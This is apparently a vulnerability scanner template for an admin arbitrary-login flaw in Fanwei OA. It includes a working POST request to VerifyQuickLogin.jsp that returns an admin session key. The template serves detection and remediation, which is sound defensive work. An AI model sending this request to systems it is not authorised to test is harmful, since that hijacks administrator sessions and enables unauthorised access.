id: Fangwei-OA-AdminLogin
info:
  name: Fanwei OA Admin Arbitrary Login
  author:
  - l0ne1y
  description: |-
    Fanwei OA Admin Arbitrary Login
    The Fanwei OA system has an admin arbitrary login vulnerability. An attacker can access an unauthorized interface to obtain the admin session and thereby log in as the admin arbitrarily.
  severity: high
  remediation: |-
    ## Official remediation
    Upgrade to the latest version.
    ## Temporary remediation
    Contact official customer support to obtain the fix patch.
requests:
- matchers:
  - type: word
    words:
    - sessionkey
  path:
  - '{{BaseURL}}/mobile/plugin/VerifyQuickLogin.jsp'
  method: POST
  body: identifier=1&language=1&ipaddress=127.0.0.1
